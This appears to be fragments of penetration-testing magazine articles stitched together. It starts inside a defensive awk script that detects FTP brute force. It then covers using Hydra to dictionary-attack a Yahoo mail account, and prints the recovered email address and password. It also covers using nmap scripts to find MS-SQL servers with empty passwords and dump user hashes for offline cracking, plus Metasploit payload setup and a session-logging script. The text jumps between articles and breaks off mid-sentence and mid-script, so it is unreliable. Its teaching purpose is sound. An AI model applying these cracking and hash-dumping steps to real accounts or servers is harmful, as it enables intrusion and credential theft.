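    printf 'Wed Jan  1 10:00:14 2014 [pid 214] [alice] OK LOGIN: Client "192.168.1.60"\n'
    printf 'Wed Jan  1 10:00:15 2014 [pid 215] [admin] OK LOGIN: Client "192.168.1.50"\n'
}

# brute_force_report THRESHOLD: read a vsftpd log on stdin. Print one line per
# client whose failed logins reached THRESHOLD, and one more line for any such
# client that then logged in successfully (the account is probably compromised).
brute_force_report() {
    awk -v thr="$1" '
        # client(s): the address inside Client "..."
        function client(s,   m) {
            match(s, /Client "[^"]*"/)
            m = substr(s, RSTART + 8, RLENGTH - 9)
            return m
        }
        # user(s): the account name inside [...] just before FAIL/OK LOGIN
        function user(s,   m) {
            match(s, /\[[^]]*\] (FAIL|OK) LOGIN/)
            m = substr(s, RSTART + 1)
            sub(/\].*/, "", m)
            return m
        }
        /FAIL LOGIN: Client "/ { ip = client($0); fails[ip]++ }
        /OK LOGIN: Client "/   { ip = client($0); if (fails[ip] >= thr) hit[ip] = user($0) }
        END {
            for (ip in fails) if (fails[ip] >= thr)
                printf "%s %d failed logins\n", ip, fails[ip]
            for (ip in hit)
                printf "%s SUCCESS as %s after %d failures\n", ip, hit[ip], fails[ip]
        }' | sort
}

# Stand-alone run over the constructed excerpt with a threshold of 10.
# Live use: brute_force_report 10 < /var/log/vsftpd.log
sample_vsftpd_log | brute_force_report 10
```

With a threshold of 10 the sample produces two lines for 192.168.1.50 (12 failed logins, then a success as admin after 12 failures) and nothing for 192.168.1.60, whose single failure is normal user behaviour. The threshold is deliberately a parameter: on a busy server you would raise it or add a time window, and the "SUCCESS after failures" line is the one worth paging on, because it means the dictionary contained the password.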
Let's see one more example of using Hydra, but this time to crack Yahoo mail accounts (the same logic applies to
Gmail or Hotmail or all other mail servers). We use the following settings:
Simple target: smtp.mail.yahoo.com (Yahoo server)
Protocol: smtp
Port: 465
Enable also: SSL, verbose and show attempts.
The name that we specify as target is the mail account that we are attempting to crack, so in my example I
put my account, and I also specified a dictionary for the attack, which is the same one that I have been using
throughout this presentation (Figure 10 and Figure 11).
Figure 10. Hydra Target tab settings for cracking yahoo passwords
Figure 11. Hydra Passwords tab settings for cracking yahoo passwords
If we now choose to start Hydra you will notice an output like the one in Figure 12. I have shortened the
dictionary to limit the time to execute as well as to shorten the output in order to focus on the result.
Figure 12. Attacking yahoo mail account and revealing the password
An additional line at the end will state:
[25] [smtp] host: 188.125.69.59 login:
zeroout2003@yahoo.gr password: backtrack
If I use the above credentials I will be able to successfully log in to my mail account using the standard web
page at https://login.yahoo.com/.
Summary
The above article clearly shows how easy it is to target a system. We have used nmap as a network scanner,
and the supported protocols and functions of Hydra.
As we already stated through the course of this article, when dealing with dictionary attacks, the tools are only as
strong as their internal dictionaries and the processing power that someone has at their disposal in order to
combine the dictionary attack with proper brute-force cracking capability. There are also a lot of other tools
in BackTrack for online and offline password cracking, such as RainbowCrack, John the Ripper,
Medusa, Ncrack and many others that are worth dissecting in other articles.
For instance, John the Ripper has the ability to crack password hashes, so if we get the hashed contents of a
password file, the application can recover the initial plain text form from a variety of hashed passwords.
You will be amazed that many people still use default passwords or just simple words as passwords.
Never underestimate how simple-minded users or system administrators can be. I am sure you can remember
the old movie Hackers; the passwords referenced are: love, secret, sex and God. You wouldn't
believe how many people use these words as their passwords.
Nikolaos Mitropoulos has been working for over a year as a network security
engineer for AT&T's Managed Security Services team. He is Cisco and Juniper
certified (holding CCNA, JNCIA and JNCIS-SEC certifications). In the past four years
he has focused on teaching at various education levels, varying from
secondary education level courses to demanding corporate classes for professionals
dealing with multiple aspects of the networking and security fields. His hobbies are
steganography, digital watermarking and building penetration testing skills.
NMAP
NMAP is a security scanner written by Gordon Lyon and it's mainly used to discover hosts and services on a
computer network, thus creating a map of the network. NMAP has lots of features that let you see
networks, such as host discovery, service and operating system detection, etc. One of the coolest features, and
the one we will use today, is the NSE or NMAP Scripting Engine. These scripts can perform more advanced
service detection, vulnerability analysis, and even brute forcing. For now we will focus on just the scripts that
analyze MS-SQL. To see a full list of the scripts that are related to MS-SQL, go to your terminal and type
cd /opt/metasploit/common/share/nmap/scripts (Figure 1). These are the scripts that we have available, and they
can be used with multiple arguments to augment their power, as we will see later on. The first thing we'll do
is scan our network for MS-SQL servers (Figure 2).
Figure 3. NMAP finds that our server has not been patched
The next thing is to find if any account has an empty password (Figure 4).
as its password. If you know SQL, all you have to do now is log in to the server and do whatever you
want. However, instead of doing that, we will continue testing our NMAP scripts. Let's try to find some
configuration information (Figure 6).
Figure 7. NMAP provides us with the table info on our MS-SQL server
Let's look at the last two scripts we will test (Figure 8). Here you can see that you are able to pull the
database name and the username of the creator. This is a good way to see other usernames so you can get a
better idea of how many people access this MS-SQL instance. The last script allows you to pull the hashes
of the available users. Once you have these you don't need to attack the server directly; you can move on to an
offline attack with tools like John the Ripper and try to crack the hashes to get more credentials.
Figure 8. NMAP script to obtain database owner info and user hashes
We have covered essentially what your possibilities are with NMAP against any MS-SQL server. As you can
see, there is a lot of info that can be gathered, especially if you are able to find a valid credential to access the
MS-SQL instance. If you refer back to Figure 3 you will notice that once this MS-SQL Server software was
installed, it never received additional patching. This opens the door to a lot of possible vulnerabilities and it's
our cue to move on to Metasploit.
Metasploit
Metasploit is a framework that provides the infrastructure needed to automate the multiple tasks required in order
to assess and/or exploit vulnerabilities found in a host. It provides multiple tools that allow you to scan almost
any host and check for security holes that can later be exploited by using one or many of its catalogued exploits.
Still, beware: this is not a magical point-and-click tool. Just because you may find misconfigured things via its
scanner modules doesn't mean that there is an exploit guaranteed to work. Sometimes you need to modify the
actual exploit code, and sometimes they just won't work.
Metasploit was developed by HD Moore as a flexible and maintainable framework for the
creation and development of exploits, saving him the time of having to validate and sanitize public
exploit code. His first iteration had 11 exploits. Now you can find well over a thousand exploits as well as
auxiliary modules and NOPs. Today, Metasploit is a necessary tool for penetration testing and exploitation.
To get Metasploit running you can follow the path stated on the next figure (Figure 9).
We are using a bind type of payload; if there are firewall rules that block connection attempts from outside hosts
to any machine other than those allowed by the rules, this won't work, so you may want to try using a
reverse type of connection so that the victim connects to you. If the firewall also filters connection attempts from
internal PCs to unknown hosts, then you are out of luck. Now we are all set up, so we verify our options once
again and type exploit to start the exploitation attempt (Figure 16).
Now you can type help to explore all options. As an example we can type the command shell and explore
(Figure 19).
echo "2 - Continue Previous Project"
echo "3 - Exit Script"
echo
read -p ">>> " option
echo
# OPTION 1 - Create a new folder for a new project engagement...
if [ "$option" = 1 ]; then
    read -p "New Project Folder: " folder
    mkdir "/root/$folder"                  # create the engagement folder under /root
    cd "/root/$folder" || exit 1
    echo
    d=$(date +%Y_%m_%d_%H_%M)              # timestamp used as the log file name
    echo "Your log: $d"
    echo
    echo "Loading msfconsole... Please Wait..."
    # build the msfconsole resource file: timestamp every line and spool the session to the log
    echo "set TimestampOutput true" > "/root/$folder/autolog.rc"
    echo "spool /root/$folder/$d.txt" >> "/root/$folder/autolog.rc"
    msfconsole -r autolog.rc               # start msfconsole with the resource file
fi
Okay, so once you get your script operational, let's see what it does: Figures 20-22.
Figure 22. Metasploit loaded. Notice the last lines, where it tells you that your log information is being
saved in the folder you just created. Once you get here you are ready to work.
If we run an NMAP scan from within Metasploit, you can save it to your log. Let's see (Figure 23).
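The logging helper above takes the folder name straight from the prompt and uses it unquoted in mkdir and cd, so a name like "../somewhere" lands outside /root. The function below is an added example, not the article's script: it validates the engagement name, takes the base directory as a parameter (the article uses /root) and writes the same autolog.rc with proper quoting.

```shell
#!/bin/sh
# Added example (not from the original article): hardened version of the
# project-logging helper. Validates the engagement folder name, creates the
# folder under BASE_DIR and writes the msfconsole resource file.

# Usage: make_autolog_rc BASE_DIR FOLDER_NAME
# Prints the path of the generated .rc file on success, returns 1 on error.
make_autolog_rc() {
    base="$1"
    folder="$2"

    # Accept only a plain folder name: letters, digits, '_', '-' and '.',
    # with no leading '.', so an empty name or "../../etc" can never become
    # part of the path.
    case "$folder" in
        ""|.*|*[!A-Za-z0-9_.-]*)
            echo "invalid project name: '$folder'" >&2
            return 1 ;;
    esac

    dir="$base/$folder"
    mkdir -p "$dir" || return 1

    # Timestamped log name, same format as the article's script.
    d=$(date +%Y_%m_%d_%H_%M)
    rc="$dir/autolog.rc"

    # Resource file: timestamp every line and spool the session to the log.
    {
        echo "set TimestampOutput true"
        echo "spool $dir/$d.txt"
    } > "$rc" || return 1

    echo "$rc"
}

# Stand-alone use: sh autolog.sh /root client_name, then
# msfconsole -r "$(sh autolog.sh /root client_name)".
if [ "$#" -eq 2 ]; then
    make_autolog_rc "$1" "$2"
fi
```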
Conclusion
We have explored the possibilities that NMAP has to offer to scan and analyze MS-SQL servers.
The scripting engine is a powerful tool that can help you explore lots of different things. Go ahead and experiment
with the additional possibilities. To do this, set up different services or apps like IIS, web sites, Oracle etc. and scan
those using the scripts provided to work with them. Also we were able to see the possibilities that Metasploit has
to offer and leave you with the task of comparing them to NMAP to see which works better and why. Finally, the
bonus script will help you collect the info and save it for reporting so your homework now is to repeat this tutorial
but creating the folder and log first. Also take notice of how NMAP behaves inside Metasploit. Enjoy!
Jose Ruiz is an independent consultant specializing in the areas of physical and logical
network security, with tasks ranging from policy audit, vulnerability assessment and
mitigation plan implementation to business continuity and others. He
works investigating various cases ranging from corporate misuse of resources to
phishing and wireless intrusion. Jose is also an IT instructor and Microsoft Certified
Trainer teaching courses for both Microsoft and CompTIA certifications, and a college
professor at undergraduate and graduate level teaching forensics, networking, wireless
and ethical hacking courses at both EDP University and Interamerican University in
Puerto Rico. Jose is also an active contributor to the ISECOM Hacker Highschool
project. He holds a Master's Degree in Information Systems with a specialty in electronic fraud
investigation and multiple certifications including A+, Network+, Server+, Security+, MCSA 2000 /
2003 / 2008, MCITP, MCT, OSWP, CIW and others.